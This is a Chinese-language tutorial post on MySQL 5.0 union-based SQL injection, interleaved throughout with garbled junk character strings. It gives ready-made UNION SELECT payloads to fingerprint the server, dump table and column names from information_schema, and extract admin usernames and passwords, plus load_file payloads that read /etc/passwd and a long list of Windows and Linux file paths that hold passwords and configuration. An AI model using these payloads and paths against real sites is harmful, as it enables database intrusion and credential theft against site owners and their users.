mysql5.0注入原理

admin

记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。
) J  Z3 }3 B9 W$ h2 j: i+ T" O+ S
/ u, o3 a- h1 ]" o' D2 T

Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
中记录了Mysql中所有
, Z- @$ E+ Q2 j% v" |存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
6 n3 {; r) {  T' S8 S明。
9 g4 g( w+ y5 G; I1.得到所有数据库名：
. B" Y$ u' J5 x" w: j|SCHEMATA ->存储数据库名的表
|—字段：SCHEMA_NAME ->数据库名称

0 i6 i! t4 z1 U3 ]( \$ j- q/ ?|TABLES ->存储表名
|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
7 m- ?% X; F3 ^% W9 \& a/ Y) U|—字段：TABLE_NAME ->存储表的表名
3 T# `! i, _# U* `4 W: m' {" [
, w0 |* V0 ~7 n4 ~7 c( [/ h2 I6 w$ h|COLUMNS ->存储的字段名表
. g' a8 T4 Q# `% S1 [# Y# F|—字段：TABLE_SCHEMA ->该字段所属数据库名
8 b; G' m8 G* T7 Y7 J! U* e|—字段：TABLE_NAME ->存储所属表的名称
& z# U4 T/ u& N$ G2 c
, C) i. _( w3 j/ K/ c|—字段：COLUMN_NAME ->该字段的名称
3 N  s7 ^9 Q; ?  J$ A
' f9 F: }* x' y1 ^% }; U2 e2 g# R#########################################################################
$ E' p8 q8 b4 n. u##

0×001 获取系统信息:

union select 1,2,3,4,5,concat
(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*

/*

( l- E( R; x& l4 Q: w# y* c@@global.version_compile_os 获取系统版本

@@datadir 数据库路径
database() 当前数据库名称
% B. C! `6 O" A& A3 q0x3c62723e 换行HEX值
3 m% z  m7 y0 h0 W$ c! g. j
- ^; _/ K7 h8 v: Q' w7 j! B$ j  v*/

######################################################################

0 y5 z1 L& a7 N7 ?7 [0×002 获取表名
( N5 h$ T7 H- ]  `
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from
information_schema.tables where table_schema=0x67617264656e /*
" {7 T0 j3 W+ R7 i! q5 j
2 F' _2 t7 Z% D2 _+ N0 K2 P/*
4 p( i' F" J3 e
0x67617264656e 为当前数据库名
+ T) t2 ^8 [3 b2 R" \  _* l1 L
2 |4 g  |% r1 i. [3 W; r! k1 qgroup_concat(table_name) 使用group_concat函数 一步获得该库所有表名
% Q/ G& T- i* t8 \; B2 x
6 y  X; E( l0 ], e+ `& [3 F. J( e*/
$ K* y, L2 k9 L) s6 L% M; v
0 G( m7 R/ d& w3 Z######################################################################

0×003 获取字段
* B9 R( U9 {9 Y( ]# V: V4 V
3 N' ^2 W: W" K" |union select 1,2,group_concat(column_name),4,5,6,7,8,9 from
information_schema.columns where table_name=0x61646d696e and

7 O( g1 k& J3 z' {) e% O
table_schema=0x67617264656e limit 1 /*

, Y0 U3 x  {7 t' ]: y5 |( C/*

  Q- t/ A4 \- o' I5 @group_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段

0x61646d696e ->选择一个表
/ i1 x/ S- s/ M) I  d3 @. S6 O
0x67617264656e ->数据库名
' C+ D, ~" P7 U! f' i
*/
* z' H0 ~3 W' I0 {# {0 ~
8 z7 l2 ]: q& z* S+ K" G% F#####################################################################
) q% Z% v1 ~9 F4 b2 j! P; u( Q
0×004 获取数据

6 R) B% y( ~" ]& c" o0 u: W, dunion select 1,2,3
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
' p& x* @! Y! D5 S$ \5 w3 Z. X
) F7 d; r2 W6 \9 K" L0 \- punion select 1,group_concat(id),group_concat(adname),4,5,group_concat
(adpassword),6,7,8 from admin
( r' L9 R; ~( k5 P+ I" x& q# P
7 R3 n( f" Z$ Z/ s/*

0x3c62723e 换行符号HEX编码

group_concat 同时获得该字段所有数据
5 B" }$ L4 S' O7 ]% h
: e/ u% B, N8 v*/

; g% Z, m( @3 B2 Q
3 f& |: x% S) @. k$ g, }; h
; |, v% ^5 y: J% k
5 u5 E4 J, C  g. @
顺便添加一些mysql注入时非常有用的一些东西
, J: y9 B$ `* }" R# R( }
( t0 I0 p+ J4 q. M简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。

1:system_user() 系统用户名
2:user()        用户名
8 Z$ }. Q5 J; l3 N: o/ p& B2 |3:current_user()  当前用户名
4:session_user()连接数据库的用户名
5:database()    数据库名
6:version()     MYSQL数据库版本
7:load_file()   MYSQL读取本地文件的函数
8@datadir     读取数据库路径
) D/ Y8 O! Z! K0 |; ~' D6 p4 C9@basedir    MYSQL 安装路径
10@version_compile_os   操作系统  Windows Server 2003,
收集的一些路径：
WINDOWS下:
0 P# {2 W" u# W" q0 ^c:/boot.ini          //查看系统版本
c:/windows/php.ini   //php配置信息
: `) R! @3 y% s, {% y+ Cc:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
6 N6 c- Z6 W/ ~* B# @, cc:/winnt/php.ini
  T3 l1 Q7 a) X6 K- o9 C, o# Kc:/winnt/my.ini
c:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
c:\Program Files\Serv-U\ServUDaemon.ini
( F  o2 M4 y& l8 T5 |% oc:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
c:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
) f+ y* x9 c* Z+ X$ I) ^c:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
//存储了pcAnywhere的登陆密码
c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
1 t3 g. ^% s9 n9 e1 dc:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.


- p) I% P2 Z1 m2 x% Z5 Kc:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
2 A, o+ X- |, e' X8 J3 n2 pd:\APACHE\Apache2\conf\httpd.conf
! U7 ~/ k4 z) M% y* |9 zC:\Program Files\mysql\my.ini
c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
% K8 c: e3 Z! Z8 D- P- TC:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码
( n3 X0 x8 [$ I' x& S) y% B" V
LUNIX/UNIX下:
, }* I9 m+ i: T# F+ P% g: M% i$ l& \/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
4 b; l" _' ~- J' |/usr/local/apache2/conf/httpd.conf
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
. e5 K" h4 c7 T# w0 C, l9 f5 h9 R  u& X/usr/local/app/php5/lib/php.ini //PHP相关设置
$ e+ C1 d: v" ]/etc/sysconfig/iptables //从中得到防火墙规则策略
/etc/httpd/conf/httpd.conf // apache配置文件
/etc/rsyncd.conf //同步程序配置文件
/etc/my.cnf //mysql的配置文件
/etc/redhat-release //系统版本
/ n! d) p, c. X( F8 P8 R& Y/etc/issue
6 `0 z8 r7 ~* @1 ]0 A/etc/issue.net
6 L* p. T( m# u& }4 z/usr/local/app/php5/lib/php.ini //PHP相关设置
4 `: C; }8 I- z/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
% v% @* ?' Q* p9 ?  d2 ^7 {9 p. o/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
% g0 l+ ?$ N  F9 o1 [, u7 J: n0 }/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
' ?$ Q$ x- ^8 g7 @. O- N/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
: a7 n/ D  n' W2 h1 E& n4 }. Z/etc/sysconfig/iptables 查看防火墙策略
load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
replace(load_file(0x2F6574632F706173737764),0x3c,0×20)
replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
. H, B/ r7 X" B5 z上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.